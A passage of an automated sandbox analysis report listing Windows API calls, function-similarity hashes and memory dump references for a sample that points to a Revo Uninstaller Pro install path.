                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileWrite$Handle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4209713984-0
                                                                                                                                                                            • Opcode ID: 4d70e66ffc7fb40e19249583a00037fa9d07b548960d7e01ad6af23c7309d4a1
                                                                                                                                                                            • Instruction ID: 3dc8fbf58365e075606fe800fbaab6348781f35be6c78bbef024466f25739b8e
                                                                                                                                                                            • Opcode Fuzzy Hash: 4d70e66ffc7fb40e19249583a00037fa9d07b548960d7e01ad6af23c7309d4a1
                                                                                                                                                                            • Instruction Fuzzy Hash: C0313A71618306AFD7219F50C808BA6B7DBFB51311F08860AF195933C0C7B4A848DBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00FD9DFE,?,00000001,00000000,?,?), ref: 00FD9F19
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00FD9DFE,?,00000001,00000000,?,?), ref: 00FD9F4C
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00FD9DFE,?,00000001,00000000,?,?), ref: 00FD9F69
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateDirectory$ErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2485089472-0
                                                                                                                                                                            • Opcode ID: ff6c4ba08f1e031e2018df043fae8cdb799b52dc2c61b5222ce3442ba68ea615
                                                                                                                                                                            • Instruction ID: 0c7c1030c095bc21c22053cc94f0e1e4cde8e36b6d28006dead4d073d5092f69
                                                                                                                                                                            • Opcode Fuzzy Hash: ff6c4ba08f1e031e2018df043fae8cdb799b52dc2c61b5222ce3442ba68ea615
                                                                                                                                                                            • Instruction Fuzzy Hash: 5B01923190C254A5EB329BE58C49BFD334E9F05750F0C0443F541D5252D7D8C981F6A6
                                                                                                                                                                            APIs
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00FEC8FC
                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FEC915
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00FEC920
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ObjectSingleWait$MessagePeek
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1965964400-0
                                                                                                                                                                            • Opcode ID: 817da017f381c5842302045737834fbf5addf426a9566e857843890516a6686c
                                                                                                                                                                            • Instruction ID: c6d680df05fb595ec19406692208022d9a493cdc376ab6207fd03a93cb51c859
                                                                                                                                                                            • Opcode Fuzzy Hash: 817da017f381c5842302045737834fbf5addf426a9566e857843890516a6686c
                                                                                                                                                                            • Instruction Fuzzy Hash: 55E04F31B403087BEA216F90EC8EFA97B6AE718741F504022FB46A90C6D6A658919795
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                                            • String ID: CMT
                                                                                                                                                                            • API String ID: 3519838083-2756464174
                                                                                                                                                                            • Opcode ID: 2e5d8ef510c2c20c994a9ce8aa46d7cc513aa304510cc0b4cd7634e84ff7c3b5
                                                                                                                                                                            • Instruction ID: 06c5368cd0bc2427689ddbb7f528370ec3f7249d5b7bd2d65c30a9a3dae6b181
                                                                                                                                                                            • Opcode Fuzzy Hash: 2e5d8ef510c2c20c994a9ce8aa46d7cc513aa304510cc0b4cd7634e84ff7c3b5
                                                                                                                                                                            • Instruction Fuzzy Hash: E571C276500B44AEDB21DB30CC41AEBB7EAAF14301F48495FE6DB87342D6356A48EF12
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00FD1D66
                                                                                                                                                                              • Part of subcall function 00FD399D: __EH_prolog.LIBCMT ref: 00FD39A2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                                            • String ID: CMT
                                                                                                                                                                            • API String ID: 3519838083-2756464174
                                                                                                                                                                            • Opcode ID: ebb0ffb01c222930deb2644d31da2adea97b555273461bf5416e85782901d22d
                                                                                                                                                                            • Instruction ID: b3914feabf8a0fddc717b6da8f569e168c4b608421284ef488d6816db0564dd2
                                                                                                                                                                            • Opcode Fuzzy Hash: ebb0ffb01c222930deb2644d31da2adea97b555273461bf5416e85782901d22d
                                                                                                                                                                            • Instruction Fuzzy Hash: DD214B72904148AFCB15EF99DD51AEEFBF6FF48300F1800AAE845A7251C7365E50EBA0
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FE1432: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,?,00000000,?,00FDAB7B,?,?,00000000,?,?,?), ref: 00FE1484
                                                                                                                                                                              • Part of subcall function 00FE9A8D: SetCurrentDirectoryW.KERNEL32(?,00FE9CE4,C:\Program Files\VS Revo Group\Revo Uninstaller Pro,00000000,010185FA,00000006), ref: 00FE9A91
                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,010185FA,00000006), ref: 00FE9D36
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Program Files\VS Revo Group\Revo Uninstaller Pro, xrefs: 00FE9CDA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CompareCurrentDirectoryFileOperationString
                                                                                                                                                                            • String ID: C:\Program Files\VS Revo Group\Revo Uninstaller Pro
                                                                                                                                                                            • API String ID: 3543741193-2410753234
                                                                                                                                                                            • Opcode ID: f31882dc081ce5e9c64cada86b39a56e2da7848e2ac60afa1a9fb8f03af12801
                                                                                                                                                                            • Instruction ID: 74fcde6cd04bc2072d95d309a43ea8e20cf53b36d83152388b6db36c1aaa778e
                                                                                                                                                                            • Opcode Fuzzy Hash: f31882dc081ce5e9c64cada86b39a56e2da7848e2ac60afa1a9fb8f03af12801
                                                                                                                                                                            • Instruction Fuzzy Hash: 6F017571D4029965DB21ABE5DC0AEDF73BCEF08710F000466F645E3142E6FD9A449BA5
                                                                                                                                                                            APIs
                                                                                                                                                                            • try_get_function.LIBVCRUNTIME ref: 00FF282F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: try_get_function
                                                                                                                                                                            • String ID: FlsAlloc
                                                                                                                                                                            • API String ID: 2742660187-671089009
                                                                                                                                                                            • Opcode ID: 0c828d6a5101e3fb2fe55a2d9507028a97e8ab6588037f98864c5d3f4d19ef4b
                                                                                                                                                                            • Instruction ID: 1aed2fe31522218a830035554a3fca66d680d8839413a892e8b4451195769363
                                                                                                                                                                            • Opcode Fuzzy Hash: 0c828d6a5101e3fb2fe55a2d9507028a97e8ab6588037f98864c5d3f4d19ef4b
                                                                                                                                                                            • Instruction Fuzzy Hash: 3CD02B31B8132C63D51232C67C029AA7F088B00BB1F015063FF4CA9142D5D90C0062D5
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED7EC
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: 3Ro
                                                                                                                                                                            • API String ID: 1269201914-1492261280
                                                                                                                                                                            • Opcode ID: 19ca2d97b2de8b3d720338f3ac7775cd1f7b5c66ca378fb070aaa50009e0144d
                                                                                                                                                                            • Instruction ID: 0d6aa7dca1377519d8dcf55480a6f3f1f853c2431d6abd7b7323a4a680796a0b
                                                                                                                                                                            • Opcode Fuzzy Hash: 19ca2d97b2de8b3d720338f3ac7775cd1f7b5c66ca378fb070aaa50009e0144d
                                                                                                                                                                            • Instruction Fuzzy Hash: 8CB01282368681FD30067283AE02C37020CD1D0B3C730840FF444C44C6D4459C412031
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memcmp_strlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2682527083-0
                                                                                                                                                                            • Opcode ID: 3d08641e980d69e625634e8e02d798a51ae55842b5efb60c040b4d7eb3c6c822
                                                                                                                                                                            • Instruction ID: 50fa6068321ec506bc96ae7e3d0c558088cc03326e7b63f601a156de1294eb63
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d08641e980d69e625634e8e02d798a51ae55842b5efb60c040b4d7eb3c6c822
                                                                                                                                                                            • Instruction Fuzzy Hash: F251D873504344ABDB20EA50DC89FDBB3EDAB89700F08093EF989D7252DA39E544D766
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00FD1382
                                                                                                                                                                              • Part of subcall function 00FD5E99: __EH_prolog.LIBCMT ref: 00FD5E9E
                                                                                                                                                                              • Part of subcall function 00FDC4CA: __EH_prolog.LIBCMT ref: 00FDC4CF
                                                                                                                                                                              • Part of subcall function 00FDC4CA: new.LIBCMT ref: 00FDC512
                                                                                                                                                                              • Part of subcall function 00FDC4CA: new.LIBCMT ref: 00FDC536
                                                                                                                                                                            • new.LIBCMT ref: 00FD13FA
                                                                                                                                                                              • Part of subcall function 00FDAD1B: __EH_prolog.LIBCMT ref: 00FDAD20
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                                            • Opcode ID: 44631df13c2e7893f4bec552b3f4b6bb4ffa2d3171462db5041f8034c3859b15
                                                                                                                                                                            • Instruction ID: 5ecfc486bf7966052acd9abe04a4ff7438c4705c51421f47955c161d937718e9
                                                                                                                                                                            • Opcode Fuzzy Hash: 44631df13c2e7893f4bec552b3f4b6bb4ffa2d3171462db5041f8034c3859b15
                                                                                                                                                                            • Instruction Fuzzy Hash: ED4155B1805B409EE720DF798885AE6FBE6FF19300F544A2ED5EE83282CB366554CB11
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00FD1382
                                                                                                                                                                              • Part of subcall function 00FD5E99: __EH_prolog.LIBCMT ref: 00FD5E9E
                                                                                                                                                                              • Part of subcall function 00FDC4CA: __EH_prolog.LIBCMT ref: 00FDC4CF
                                                                                                                                                                              • Part of subcall function 00FDC4CA: new.LIBCMT ref: 00FDC512
                                                                                                                                                                              • Part of subcall function 00FDC4CA: new.LIBCMT ref: 00FDC536
                                                                                                                                                                            • new.LIBCMT ref: 00FD13FA
                                                                                                                                                                              • Part of subcall function 00FDAD1B: __EH_prolog.LIBCMT ref: 00FDAD20
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                                            • Opcode ID: 5353660e0434e771c8b0ed7f1cd3e2181be3edd9ea533872666ff1c593aded82
                                                                                                                                                                            • Instruction ID: bfbec0c63f6ff6d5e22a8a8a310bec3756a8e50f3c0c670dd0f99008b12105d1
                                                                                                                                                                            • Opcode Fuzzy Hash: 5353660e0434e771c8b0ed7f1cd3e2181be3edd9ea533872666ff1c593aded82
                                                                                                                                                                            • Instruction Fuzzy Hash: D34137B1805B409EE724DF798885AE6FBE6FF19300F544A2ED5EE83282CB366554CB11
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FF8516: GetLastError.KERNEL32(?,010100E0,00FF3394,010100E0,?,?,00FF2E0F,?,?,010100E0), ref: 00FF851A
                                                                                                                                                                              • Part of subcall function 00FF8516: _free.LIBCMT ref: 00FF854D
                                                                                                                                                                              • Part of subcall function 00FF8516: SetLastError.KERNEL32(00000000,?,010100E0), ref: 00FF858E
                                                                                                                                                                              • Part of subcall function 00FF8516: _abort.LIBCMT ref: 00FF8594
                                                                                                                                                                              • Part of subcall function 00FFA7D1: _abort.LIBCMT ref: 00FFA803
                                                                                                                                                                              • Part of subcall function 00FFA7D1: _free.LIBCMT ref: 00FFA837
                                                                                                                                                                              • Part of subcall function 00FFA446: GetOEMCP.KERNEL32(00000000,?,?,00FFA6CF,?), ref: 00FFA471
                                                                                                                                                                            • _free.LIBCMT ref: 00FFA72A
                                                                                                                                                                            • _free.LIBCMT ref: 00FFA760
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$ErrorLast_abort
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2991157371-0
                                                                                                                                                                            • Opcode ID: c198be3fd69c6bac0e10fe0ddf45a1f99fdbc5723a468fc46286a352559ca7fb
                                                                                                                                                                            • Instruction ID: 5800947ac8c633864641c050c36240b1b2373ebb1f85692a3978089c939e7701
                                                                                                                                                                            • Opcode Fuzzy Hash: c198be3fd69c6bac0e10fe0ddf45a1f99fdbc5723a468fc46286a352559ca7fb
                                                                                                                                                                            • Instruction Fuzzy Hash: 5031A472D0420CAFDB11FBA8D881B79B7F4DF40360F254099E6089B2B1EB7A5E41EB51
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00FD9BF3,?,?,00FD76AC), ref: 00FD95B0
                                                                                                                                                                            • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00FD9BF3,?,?,00FD76AC), ref: 00FD95E5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                            • Opcode ID: ed8d9ac9ddeaba694ff9f5c196f7cdff9aba18992dcd262e65e80d7672ff6067
                                                                                                                                                                            • Instruction ID: f23d2ca59e311ca12740d4559f1e4ee5eb7c5da352c26f3567021b9e41c4ae33
                                                                                                                                                                            • Opcode Fuzzy Hash: ed8d9ac9ddeaba694ff9f5c196f7cdff9aba18992dcd262e65e80d7672ff6067
                                                                                                                                                                            • Instruction Fuzzy Hash: 86213AB1408348AFE7318F54DC45BA777E9EB45364F08492EF5D5822C2C3B9AC48EB61
                                                                                                                                                                            APIs
                                                                                                                                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00FD738C,?,?,?), ref: 00FD9A98
                                                                                                                                                                            • SetFileTime.KERNEL32(?,?,?,?), ref: 00FD9B48
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$BuffersFlushTime
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1392018926-0
                                                                                                                                                                            • Opcode ID: b312acef44cd49da49875c4daef4bf41cc4417bd317b8bf5b58d81a0ed7cb323
                                                                                                                                                                            • Instruction ID: d7d6904eb9ad1cf1164f8ca6bbc5a835e3999854824b55c4e82ca04ee82b5f8c
                                                                                                                                                                            • Opcode Fuzzy Hash: b312acef44cd49da49875c4daef4bf41cc4417bd317b8bf5b58d81a0ed7cb323
                                                                                                                                                                            • Instruction Fuzzy Hash: 8121E73264C386AFC711DF64C891AABBBD5AF91314F08091EB8C0C7241D7ADDD48E791
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00FD9B8D
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00FD9B99
                                                                                                                                                                            Memory Dump Source
